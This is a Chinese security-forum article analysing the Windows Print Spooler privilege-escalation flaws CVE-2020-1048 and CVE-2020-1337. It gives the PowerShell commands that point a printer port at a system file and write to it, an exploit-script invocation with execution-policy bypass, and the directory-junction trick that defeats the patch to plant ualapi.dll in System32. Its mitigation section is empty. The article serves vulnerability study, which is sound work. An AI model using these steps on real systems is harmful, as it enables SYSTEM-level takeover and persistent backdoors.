CVE-2020-1048、CVE-2020-1337漏洞原理及利用
本文为看雪论坛优秀文章
看雪论坛作者ID:Cc28256
前言
今年5月,微软发布安全补丁以修补Windows 打印机后台处理程序高危本地提权升级漏洞,编号CVE-2020-1048。它可以获取系统管理员权限,甚至部署持久化后门,影响范围自1996年以来发布(Windows NT 4)的所有Windows版本。
这个漏洞的核心原理在于Windows添加打印机时,对port name的检查函数可以被绕过,设置为任意文件,因此我们可以把任意内容输出到port name对应的系统文件(如某个dll)中,实现权限提升。经过补丁后,紧随其后的CVE-2020-1337又有姿势可以绕检查。
了解需要利用漏洞前一些基本信息
Printers, Drivers, Ports
打印机至少有两个要素:
1. 打印机端口
你可以认为它是现在的USB端口,甚至是TCP/IP端口(和地址),打印机可以打印到一个文件(在Windows 8及以上)。
2.打印机驱动程序
这曾经是一个内核模式组件,但是有了新的"v4"模型,这些都是在用户模式下完成的,到现在已经超过十年。
由于以Spooler实施的服务Spoolsv.exe具有SYSTEM特权,并且可以通过网络访问,因此这两个要素吸引了人们执行各种有趣的攻击。
为了使标准用户帐户更容易使用,并且由于这些帐户现在以用户模式运行,只要驱动程序是一个 预先存在的,内置驱动程序,不需要任何特权就可以安装一个打印驱动程序。
Add-PrinterDriver -Name "Generic / Text Only"
添加一个打印机端口:
Add-PrinterPort -Name "C:\windows\tracing\myport.txt"
Get-PrinterPort | ft Name 可以查看到或者查看注册表这个位置:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports
在peocessmointer监控中可以看到这个动作(发现测试几次截图时搞混了没有原来的图了,下面截图中的C:\windows\test\test.txt实际上是C:\windows\tracing\myport.txt)
系统中添加一台新打印机:
Add-Printer -Name "PrintDemon" -DriverName "Generic / Text Only" -PortName "c:\windows\tracing\myport.txt"
输出到文件:
"Hello,Printer!" | Out-Printer -Name "PrintDemon"
打印到内容在c:\Windows\tracing\myport.txt,我们找到这个文件查看一下:
hiew打开文档会发现内容实际比我们输入的要多,PowerShell认为这是实际的打印机。因此会按照文档格式的边距,为顶部边距添加了几行新内容。
让我们重新创建新的文件C:\Windows\System32\Ualapi.dll,这个位置因为需要特特殊的权限所以会被阻拦 这个函数会使Windows print spooler服务对端口的合法性校验,当前用户无法将其设置为一个自己不具有访问权限的路径创建文件时,会检查Token权限进行验证,同时IDA中也能找到这段代码:
Client Side Port Check Vulnerability
(CVE-2020-1048)
CVE-2020-1337
powershell -ep bypass -F C:\CVE-2020-1337-exploit-master\exploit.ps1
cmd /c mklink /J c:\users\test\mytarg5 C:\Windows\system32
将port name指向c:\users\test\myfolder\xxx.dll,通过检查后,再将mytarg5作为一个软链接重定向到目标的系统路径中,即可完成对补丁的绕过。
为什么是ualapi.dll
accesschk.exe -c * -L > servsddl.txt
[0] ACCESS_ALLOWED_ACE_TYPE: Everyone
SERVICE_QUERY_STATUS
SERVICE_START
既然能够加载我们先前释放的动态库,dllmain中就可以执行我们想要执行的代码,从github上拿到的示例运行(运行在windows10系统上),他释放了一个PE在system32下,代码也非常简单的运行whoami查看权限。
如何避免
参考文献
https://github.com/ionescu007/faxhell
https://mp.weixin.qq.com/s/LLzIlKrrfpJuk6CGBRZMvw
https://windows-internals.com/faxing-your-way-to-system/
https://windows-internals.com/printdemon-cve-2020-1048/
看雪ID:Cc28256
https://bbs.pediy.com/user-845934.htm
*本文由看雪论坛 Cc28256 原创,转载请注明来自看雪社区。
推荐文章++++
求分享
求点赞
求在看